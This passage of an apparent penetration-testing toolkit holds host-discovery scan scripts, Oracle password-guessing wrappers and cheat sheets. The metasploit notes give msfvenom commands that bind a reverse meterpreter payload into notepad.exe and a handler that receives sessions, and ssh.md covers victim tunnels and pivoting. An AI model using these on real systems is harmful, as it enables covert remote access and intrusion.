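27 | # SYN-scans the 100 most common TCP ports of each target with OS detection
28 | # (-O) and reduces nmap's report to the address, OS and device-type lines.
29 | if [[ $EUID -ne 0 ]]; then
30 |     echo "For better results, please run this script as root." 1>&2
31 |     exit 1
32 | fi
33 |
34 | if [ "$#" -eq 1 ]; then
35 |     # "$1" is quoted so a range such as 10.0.0.* is handed to nmap unchanged
36 |     # instead of being glob-expanded or word-split by the shell.
37 |     nmap -sS -vv -n -Pn --reason --open -T4 --top-ports 100 -O "$1" \
38 |         | grep 'Nmap scan report for\|OS details\|Aggressive OS guesses\|Device type' \
39 |         | sed -e 's/Nmap scan report for /IP:/' -e 's/Aggressive OS guesses/OS/' -e 's/OS details/OS/'
40 | else
41 |     echo "Please provide the target ip range."
42 | fi
43 |
44 |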
--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-arpscan.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
25 | # -I Use network interface
26 |
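27 | # Usage: discover-local-live-hosts-arpscan.sh <interface> <target-range>
28 | # ARP-scans <target-range> through <interface> and writes arp-scan's output to
29 | # local_live_hosts_arp_scan_<interface>.txt in the current directory.
30 | if [[ $EUID -ne 0 ]]; then
31 |     echo "For better results, please run this script as root." 1>&2
32 |     exit 1
33 | fi
34 |
35 | if [ "$#" -eq 2 ]; then
36 |     # Use a private variable for the file name: LOGNAME is the standard
37 |     # login-name environment variable, and when it is already exported (as it
38 |     # usually is in a login session) reassigning it also changes the value
39 |     # inherited by arp-scan.
40 |     outfile="local_live_hosts_arp_scan_$1.txt"
41 |     # Collapse every run of "/" to "_" so the argument cannot add a path
42 |     # component to the file name.
43 |     outfile=$(printf '%s\n' "$outfile" | sed -r 's/[/]+/_/g')
44 |     # Quoted so the interface, range and file name are each one word.
45 |     arp-scan -N -q -I "$1" "$2" > "$outfile"
46 | else
47 |     echo "Please provide your network device and the target ip range."
48 | fi
49 |
50 |
51 |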
--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-netbios.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2019 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
25 |
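26 | # Usage: discover-local-live-hosts-netbios.sh <target-range>
27 | # Runs nbtscan -e against <target-range> and writes its output to
28 | # local_live_hosts_netbios_<target-range>.txt in the current directory, with
29 | # any "/" in the range (for example a CIDR suffix) replaced by "_".
30 | if [[ $EUID -ne 0 ]]; then
31 |     echo "For better results, please run this script as root." 1>&2
32 |     exit 1
33 | fi
34 |
35 | if [ "$#" -eq 1 ]; then
36 |     # Use a private variable for the file name: LOGNAME is the standard
37 |     # login-name environment variable, and when it is already exported (as it
38 |     # usually is in a login session) reassigning it also changes the value
39 |     # inherited by nbtscan.
40 |     outfile="local_live_hosts_netbios_$1.txt"
41 |     # Collapse every run of "/" to "_" so the argument cannot add a path
42 |     # component to the file name.
43 |     outfile=$(printf '%s\n' "$outfile" | sed -r 's/[/]+/_/g')
44 |     # Quoted so the range and the file name are each one word.
45 |     nbtscan -e "$1" > "$outfile"
46 | else
47 |     echo "Please provide a target ip range."
48 | fi
49 |
50 |
51 |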
--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-netdiscover.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2019 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
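25 | # Usage: discover-local-live-hosts-netdiscover.sh <interface> <target-range>
26 | # Runs netdiscover on <interface> against <target-range> and writes its
27 | # output to local_live_hosts_netdiscover_<interface>.txt in the current
28 | # directory.
29 | if [[ $EUID -ne 0 ]]; then
30 |     echo "For better results, please run this script as root." 1>&2
31 |     exit 1
32 | fi
33 |
34 | if [ "$#" -eq 2 ]; then
35 |     # Use a private variable for the file name: LOGNAME is the standard
36 |     # login-name environment variable, and when it is already exported (as it
37 |     # usually is in a login session) reassigning it also changes the value
38 |     # inherited by netdiscover.
39 |     outfile="local_live_hosts_netdiscover_$1.txt"
40 |     # Collapse every run of "/" to "_" so the argument cannot add a path
41 |     # component to the file name.
42 |     outfile=$(printf '%s\n' "$outfile" | sed -r 's/[/]+/_/g')
43 |     # Quoted so the interface, range and file name are each one word.
44 |     netdiscover -i "$1" -r "$2" -s 100 -N -P > "$outfile"
45 | else
46 |     echo "Please provide your network device and the target ip range."
47 | fi
48 |
49 |
50 |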
--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-passively-p0f.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2019 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
25 |
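26 | # Usage: discover-local-live-hosts-passively-p0f.sh <interface>
27 | # Runs p0f on <interface> and writes its output to
28 | # local_live_hosts_p0f_<interface>.txt in the current directory.
29 | if [[ $EUID -ne 0 ]]; then
30 |     echo "For better results, please run this script as root." 1>&2
31 |     exit 1
32 | fi
33 |
34 | if [ "$#" -eq 1 ]; then
35 |     # Use a private variable for the file name: LOGNAME is the standard
36 |     # login-name environment variable, and when it is already exported (as it
37 |     # usually is in a login session) reassigning it also changes the value
38 |     # inherited by p0f.
39 |     outfile="local_live_hosts_p0f_$1.txt"
40 |     # Collapse every run of "/" to "_" so the argument cannot add a path
41 |     # component to the file name.
42 |     outfile=$(printf '%s\n' "$outfile" | sed -r 's/[/]+/_/g')
43 |     # Quoted so the interface and the file name are each one word.
44 |     p0f -i "$1" > "$outfile"
45 | else
46 |     echo "Please provide your network device."
47 | fi
48 |
49 |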
--------------------------------------------------------------------------------
/live-hosts/ping-from-linux.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2023 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
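25 | # Usage: ping-from-linux.sh <first-three-octets>     e.g. 10.10.0
26 | # Sends one echo request to each of <prefix>.1 .. <prefix>.254 in parallel and
27 | # prints the "bytes from" reply line of every address that answers.
28 | if [ "$#" -eq 1 ]; then
29 |     # Accept the prefix with or without its trailing dot ("10.10.0." or
30 |     # "10.10.0"); with the dot the original built addresses like 10.10.0..1.
31 |     prefix=${1%.}
32 |     for i in {1..254}; do
33 |         ping -c 1 "$prefix.$i" | grep "bytes from" &
34 |     done
35 |     # Wait for the background pings so all replies are printed before the
36 |     # script returns.
37 |     wait
38 | else
39 |     echo "Please provide part of the ip range e.g. 10.10.0."
40 | fi
41 |
42 |
43 |
44 |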
--------------------------------------------------------------------------------
/m365/Readme.md:
--------------------------------------------------------------------------------
1 | ### Generate possible usernames
2 |
3 | Take a name and transform it into possible username permutations:
4 |
5 | * https://gist.github.com/superkojiman/11076951
6 |
7 | ```
8 | python3 namemash.py real_names.txt > permutations.txt
9 | ```
10 |
--------------------------------------------------------------------------------
/metasploit/binding.md:
--------------------------------------------------------------------------------
1 | ## File Binding
2 |
3 | ### Executable files
4 |
5 | ```bash
6 | msfvenom -a x86 --platform windows -x notepad.exe -k -p windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe
7 | ```
8 |
--------------------------------------------------------------------------------
/metasploit/multi-handler.md:
--------------------------------------------------------------------------------
1 | ## Multi Handler
2 |
3 | ### Run metasploit multi handler
4 |
5 | ```bash
6 | msfconsole
7 | use exploit/multi/handler
8 | set PAYLOAD windows/meterpreter/reverse_https
9 | set LHOST example.com
10 | set LPORT 443
11 | ```
12 |
13 | ### Session will never timeout
14 |
15 | ```bash
16 | set SessionCommunicationTimeout 0
17 | ```
18 |
19 | ### Execute commands on new session connection
20 |
21 | ```bash
22 | set autorunscript multi_console_command -cl "screenshot","sysinfo"
23 | ```
24 |
25 | ### Don’t exit once the first meterpreter connection is established
26 |
27 | ```bash
28 | set ExitOnSession false
29 | ```
30 |
31 | ### Run all meterpreter connections in the background automatically
32 |
33 | ```bash
34 | exploit -j
35 | ```
36 |
37 | ### List sessions
38 |
39 | ```bash
40 | sessions -l
41 | ```
42 |
43 | ### Interact with a shell
44 |
45 | ```bash
46 | sessions -i 5
47 | ```
48 |
49 | ### Send interaction with session 5 to background
50 |
51 | Press ctrl+z
52 |
--------------------------------------------------------------------------------
/metasploit/payloads.md:
--------------------------------------------------------------------------------
1 | ## Payload Generation
2 |
3 | ### Reverse https meterpreter
4 |
5 | ```bash
6 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe
7 | ```
8 |
9 | ```bash
10 | msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe
11 | ```
12 |
--------------------------------------------------------------------------------
/misc/helpful-commands.md:
--------------------------------------------------------------------------------
1 | ## Helpful commands during PT
2 |
3 | **Duplicate each line: append a copy of the line to its own end, separated by a space**
4 |
5 | ```bash
6 | paste -d ' ' filename1 filename1
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/misc/openvas.md:
--------------------------------------------------------------------------------
1 | ## OpenVAS
2 |
3 | ### Initializing & Starting OpenVAS
4 |
5 | ```bash
6 | apt-get install openvas
7 | openvas-setup
8 | openvas-start
9 | ```
10 |
11 | * https://127.0.0.1:9392
12 |
13 | ```
14 | Username: admin
15 | Password: generated and printed by the openvas-setup script
16 | ```
17 |
--------------------------------------------------------------------------------
/misc/port-forwarding.md:
--------------------------------------------------------------------------------
1 | ## Port Forwarding
2 |
3 | ### Linux Port Forwarding
4 |
5 | * rinetd
6 |
--------------------------------------------------------------------------------
/misc/print-top-tcp-ports.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
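25 | # Usage: print-top-tcp-ports.sh <count>
26 | # Prints the port list nmap uses for --top-ports <count> with a TCP connect
27 | # scan. nmap is run without a target, so nothing is scanned; the list is read
28 | # from the services="..." attribute in the XML output (-oX -).
29 | if [ "$#" -eq 1 ]; then
30 |     # NOTE(review): the sed expression in this listing ('s/||g') is not a valid
31 |     # sed command; it looks like an angle-bracketed pattern was lost. Printing
32 |     # the value of the services attribute appears to be the intent - confirm
33 |     # against the upstream file.
34 |     nmap -oX - -sT --top-ports "$1" 2>/dev/null | sed -n 's/.*services="\([^"]*\)".*/\1/p'
35 | else
36 |     echo "Please provide number of ports."
37 | fi
38 |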
--------------------------------------------------------------------------------
/misc/print-top-udp-ports.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
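# Print the UDP ports nmap selects for "--top-ports N".
# Usage: print-top-udp-ports.sh N
# The script requires root before it asks nmap for a UDP scan (-sU).
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -eq 1 ]; then
    # No target is passed; only the services="..." attribute of the XML
    # scaninfo element is wanted. The sed expression in the listing
    # ('s/||g') is not a complete substitute command, so extract the
    # attribute value explicitly.
    nmap -oX - -sU --top-ports "$1" 2>/dev/null \
        | grep 'services=' \
        | sed -n 's/.*services="\([^"]*\)".*/\1/p'
else
    echo "Please provide number of ports."
fi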
35 |
--------------------------------------------------------------------------------
/misc/responds-to-ping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
25 |
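# Report whether a host answers a single ICMP echo request.
# Usage: responds-to-ping.sh HOST
# Prints "HOST YES" or "HOST NO".
if [ $# -eq 1 ]; then
    # Use ping's exit status instead of parsing the "received" summary line:
    # when ping printed no statistics (for example an unresolvable name) the
    # parsed value was empty and the numeric test itself raised an error.
    if ping -c 1 "$1" >/dev/null; then
        echo "$1 YES"
    else
        echo "$1 NO"
    fi
else
    echo "Please provide an IP address."
fi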
36 |
--------------------------------------------------------------------------------
/misc/ssh.md:
--------------------------------------------------------------------------------
1 | ## SSH Tunnels
2 |
3 | ### Reverse SSH Tunnel
4 |
5 | *From the victim machine to our attacking box.*
6 |
7 | ```bash
8 | plink -l root -pw -R 3390:127.0.0.1:3389
9 | ```
10 |
11 | ### SSH Local Port Forwarding
12 |
13 | ```bash
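14 | ssh -L 0.0.0.0:4444:TARGET_HOST:4444 user@SSH_SERVER  # placeholders restored; 0.0.0.0 opens the listener on every interface, 127.0.0.1 keeps it local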
15 | ```
16 |
17 | ```bash
18 | ssh -L 10443:TARGET_HOST:443 user@SSH_SERVER
19 | ```
20 |
21 | ```bash
22 | ssh -L 0.0.0.0:45001:TARGET_HOST:80 user@SSH_SERVER
23 | ```
24 |
25 | ### SSH Dynamic Port Forwarding
26 |
27 | * Set a local listening port and have it tunnel incoming traffic to any remote destination through a socks proxy.
28 | * Use SSH to create a socks4 proxy on our local attacking box and tunnel all traffic sent to that port through the victim's DMZ network.
29 | * Forward/Tunnel and redirect our traffic to the victim's machine.
30 |
31 | ```bash
32 | ssh -f -N -D 9050 root@victim.example.com
33 | ```
34 |
35 | * proxychains
36 |
37 | ```bash
38 | nano /etc/proxychains.conf
39 | ```
40 |
41 | * Content
42 |
43 | ```bash
44 | [ProxyList]
45 | #...
46 | socks4 127.0.0.1 9050
47 | ```
48 |
49 | * Run e.g. nmap
50 |
51 | ```bash
52 | proxychains nmap -p 80 -sT -Pn x.x.x.0/24 --open
53 | ```
54 |
--------------------------------------------------------------------------------
/nessus/extract-info-nessus.md:
--------------------------------------------------------------------------------
1 | ## Nessus Information
2 |
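3 | * Export the scan results as a CSV file. The one-liners below strip the quotes and split on every comma, so a field that itself contains a comma shifts or truncates the printed columns.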
4 |
5 | ### Export Critical Vulnerabilities
6 |
7 | ```bash
8 | cat myproject.csv | grep '"Critical"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort
9 | ```
10 |
11 | ### Export High Vulnerabilities
12 |
13 | ```bash
14 | cat myproject.csv | grep '"High"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort
15 | ```
16 |
17 | ### Export Medium Vulnerabilities
18 |
19 | ```bash
20 | cat myproject.csv | grep '"Medium"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort
21 | ```
22 |
23 | ### Export Low Vulnerabilities
24 |
25 | ```bash
26 | cat myproject.csv | grep '"Low"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort
27 | ```
28 |
29 |
--------------------------------------------------------------------------------
/oracle/odat-passwordguesser.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
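# Run ODAT's passwordguesser module against one Oracle listener.
# Usage: odat-passwordguesser.sh HOST PORT SID
# odat.py and accounts/accounts_multiple.txt are referenced by relative path,
# so the script has to be started from the directory that holds them.
#
# The command passes a third argument to -d, so three arguments are required;
# with the former two-argument check, -d never received a value.
if [ $# -eq 3 ]; then
    python3 odat.py passwordguesser -s "$1" -p "$2" -d "$3" \
        --accounts-file accounts/accounts_multiple.txt
else
    echo "Please provide the target host, port and SID."
fi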
30 |
--------------------------------------------------------------------------------
/oracle/odat-ping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
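# Send a TNS "ping" to an Oracle listener through ODAT's tnscmd module.
# Usage: odat-ping.sh HOST PORT
# odat.py is referenced by relative path, so run this from its directory.
if [ $# -eq 2 ]; then
    # Quoted so that host and port reach odat.py as exactly one argument each.
    python3 odat.py tnscmd -s "$1" -p "$2" --ping
else
    echo "Please provide the target host and port."
fi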
30 |
--------------------------------------------------------------------------------
/oracle/odat-sidguesser.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
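# Run ODAT's sidguesser module against an Oracle listener.
# Usage: odat-sidguesser.sh HOST PORT
# odat.py is referenced by relative path, so run this from its directory.
if [ $# -eq 2 ]; then
    # Quoted to keep each value a single argument (no word splitting/globbing).
    python3 odat.py sidguesser -s "$1" -p "$2"
else
    echo "Please provide the target host and port."
fi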
30 |
--------------------------------------------------------------------------------
/oracle/odat-status.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
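# Ask an Oracle listener for its status through ODAT's tnscmd module.
# Usage: odat-status.sh HOST PORT
# odat.py is referenced by relative path, so run this from its directory.
if [ $# -eq 2 ]; then
    # Quoted so the shell does not split or glob-expand the arguments.
    python3 odat.py tnscmd -s "$1" -p "$2" --status
else
    echo "Please provide the target host and port."
fi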
30 |
--------------------------------------------------------------------------------
/oracle/odat-tnspoison.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
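# Run ODAT's tnspoison module in --test-module mode for one listener and SID.
# Usage: odat-tnspoison.sh HOST PORT SID
# odat.py is referenced by relative path, so run this from its directory.
#
# The command passes a third argument to -d, so three arguments are required;
# with the former two-argument check, -d never received a value.
if [ $# -eq 3 ]; then
    python3 odat.py tnspoison -s "$1" -p "$2" -d "$3" --test-module
else
    echo "Please provide the target host, port and SID."
fi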
30 |
--------------------------------------------------------------------------------
/oracle/odat-version.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
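# Ask an Oracle listener for its version through ODAT's tnscmd module.
# Usage: odat-version.sh HOST PORT
# odat.py is referenced by relative path, so run this from its directory.
if [ $# -eq 2 ]; then
    # Quoted so that each value is handed over as one argument.
    python3 odat.py tnscmd -s "$1" -p "$2" --version
else
    echo "Please provide the target host and port."
fi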
30 |
--------------------------------------------------------------------------------
/oracle/oracle-tnscmd-ping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
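# Send a TNS "ping" with tnscmd10g and keep a copy of the output.
# Usage: oracle-tnscmd-ping.sh HOST PORT
# Output (stdout and stderr) is shown and also written to
# oracle_tnscmd_ping_HOST_PORT.txt in the current directory.
if [ $# -eq 2 ]; then
    # Braces make the parameter boundaries in the file name explicit;
    # quoting keeps host and port as single arguments.
    tnscmd10g ping -h "$1" -p "$2" 2>&1 | tee "oracle_tnscmd_ping_${1}_${2}.txt"
else
    echo "Please provide the target host and port."
fi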
30 |
--------------------------------------------------------------------------------
/oracle/oracle-tnscmd-version.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
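# Query the listener version with tnscmd10g and keep a copy of the output.
# Usage: oracle-tnscmd-version.sh HOST PORT
# Output (stdout and stderr) is shown and also written to
# oracle_tnscmd_version_HOST_PORT.txt in the current directory.
if [ $# -eq 2 ]; then
    # Quoted arguments; braces mark where each parameter ends in the file name.
    tnscmd10g version -h "$1" -p "$2" 2>&1 | tee "oracle_tnscmd_version_${1}_${2}.txt"
else
    echo "Please provide the target host and port."
fi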
30 |
